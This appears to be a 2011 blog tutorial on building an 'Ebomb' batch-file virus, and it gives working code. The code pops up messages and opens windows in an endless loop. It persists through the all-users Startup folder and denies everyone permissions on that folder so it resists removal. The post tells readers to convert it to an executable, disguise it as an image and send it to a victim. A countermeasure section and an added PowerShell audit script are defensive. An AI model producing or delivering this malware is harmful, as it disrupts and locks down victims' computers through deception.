Tuesday, August 16, 2011

Creating Ebomb using bat file.

An Ebomb is a virus that is usually used to annoy the victim by opening multiple applications. In this tutorial I will use batch programming to create the Ebomb. You do not need any programming knowledge to create a bat file; you just need to know a few DOS commands.

Creating Process:-
1. Open Notepad, write the program as given in the examples below, and save it with a .bat extension.
2. Convert this bat file to exe file using "bat to exe" converter. Click Here to download the tool.
3. Send this file to your victim and make him click it. You can cover this file using an image file; Click Here to learn the hiding trick. Or you can upload this file to any file-sharing website like ziddu.com or megaupload.com and give the link to your victim.

Note:- In the program, "::" (double colons) marks a comment in batch programming. To create batch files, follow the "creating process" above.


Let's see the program:-
Let's say the file name is mybomb.bat.
@echo off        :: will not echo/display the commands in cmd
cacls "%allusersprofile%\start menu\programs\startup" /e /p Everyone:N
:a
msg * you have fucked yourself:D 
start notepad
start cmd
move /y "mybomb.bat" "%allusersprofile%\start menu\programs\startup\"
goto a


Hold on: the victim can easily see the contents of the mybomb.bat file and may not click the file. To avoid this, convert the file to an exe file using "bat to exe converter" and change the code a bit; see the modified code below:-


Let's say the name of the file is "mybomb.exe"

cacls "%allusersprofile%\start menu\programs\startup" /e /p Everyone:N
:a
msg * you have fucked yourself:D 
start notepad
start cmd
move /y "mybomb.exe" "%allusersprofile%\start menu\programs\startup\"
goto a

Explanation:-
This virus will pop up a message saying "you have fucked yourself" and will open notepad and cmd.exe, and this process will continue indefinitely.
We have moved our virus inside "startup" using the move command, ensuring the victim can't get away from this virus using "Restart", and finally we denied all permissions to the "startup" folder using the cacls command, so that the victim will not be able to delete the virus from the "startup" folder.
Note: I am not so sure if the move command in line 6 will work, test it, if it doesn't read this post to move the virus to "startup" folder.
Countermeasure:-
1. The first thing you should do is change the permissions of the "startup" folder. To do so, open cmd and type the following command:-
cacls "%allusersprofile%\start menu\programs\startup" /e /p Everyone:F
It will certainly give you all permissions to the startup folder, and then you can delete the virus and restart the system.
2. Use the Unlocker tool to delete a folder whose permissions are denied. Click Here to download the Unlocker tool.
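
To go with the countermeasure steps above, here is an added PowerShell example (not part of the original post) that checks the all-users Startup folder for a Deny entry for Everyone and for script or executable files placed there. It assumes Windows Vista or later with icacls available and an elevated prompt; the -RemoveDeny switch is a hypothetical name, and it strips only the Deny entry instead of granting Everyone full control.

```powershell
# Added example (not from the original post): audit the all-users Startup
# folder for the two changes the batch file above makes.
param([switch]$RemoveDeny)   # hypothetical switch: also strip the Deny entry

# CommonStartup resolves the all-users Startup path for the running Windows version.
$startup = [Environment]::GetFolderPath('CommonStartup')
$everyoneSid = 'S-1-1-0'     # well-known SID for Everyone, locale independent

# 1. Look for explicit Deny entries for Everyone (the deny the page describes).
try {
    $acl = Get-Acl -LiteralPath $startup -ErrorAction Stop
    $deny = @($acl.GetAccessRules($true, $false,
                [System.Security.Principal.SecurityIdentifier]) |
        Where-Object { $_.AccessControlType -eq 'Deny' -and
                       $_.IdentityReference.Value -eq $everyoneSid })
    if ($deny.Count -gt 0) {
        $rights = ($deny | ForEach-Object { $_.FileSystemRights }) -join '; '
        Write-Warning "Deny entry for Everyone on ${startup}: $rights"
    } else {
        Write-Output "No explicit Deny entry for Everyone on $startup"
    }
} catch {
    # A Deny that covers reading permissions can block even this query.
    Write-Warning "Cannot read ACL on ${startup}: $($_.Exception.Message)"
}

# 2. Optionally remove only the Deny entries, leaving all other ACEs untouched.
if ($RemoveDeny) {
    icacls $startup /remove:d "*$everyoneSid"
}

# 3. List scripts, executables and shortcuts that run at logon for every user.
try {
    Get-ChildItem -LiteralPath $startup -Force -ErrorAction Stop |
        Where-Object { -not $_.PSIsContainer -and
                       $_.Extension -match '^\.(bat|cmd|exe|vbs|lnk)$' } |
        Select-Object Name, Length, LastWriteTime
} catch {
    Write-Warning "Cannot list ${startup}: $($_.Exception.Message)"
}
```

Run it once without the switch to review the findings, then again with -RemoveDeny before deleting any unexpected file from the folder.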



Precaution:
Do not practice these tricks on your own PC; use a virtual machine to make and run these viruses. One such virtual machine is Sun VirtualBox. Click Here to download.
After installing VirtualBox, install XP or 7 inside it (the installation procedure is the same).
